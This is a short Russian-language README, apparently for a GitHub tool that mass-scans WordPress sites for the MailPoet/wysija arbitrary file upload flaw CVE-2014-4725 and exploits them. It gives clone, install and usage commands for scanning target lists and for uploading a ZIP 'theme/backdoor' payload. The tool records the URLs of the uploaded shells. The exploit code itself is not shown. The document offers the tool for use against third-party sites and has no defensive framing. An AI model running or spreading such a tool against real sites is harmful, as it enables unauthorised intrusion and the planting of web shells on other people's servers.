
MailPoet Newsletters <= Произвольная загрузка файлов (exploiter)
Этот скрипт используется для сканирования и эксплуатации уязвимости CVE-2014-4725 (рассылки mailpoet/wysija) в WordPress.
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
сканирование целей
python exploit.py --scan targets.txt
targets.txt содержит список целей (по одной на строку, без http://)
эксплуатация целей
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt содержит цели, уже подтвержденные как уязвимые
--payload — это ZIP-файл, содержащий тему/бэкдор для загрузки
вывод
vuln.txt > список уязвимых целей
shell.txt > URL-адреса загруженных шеллов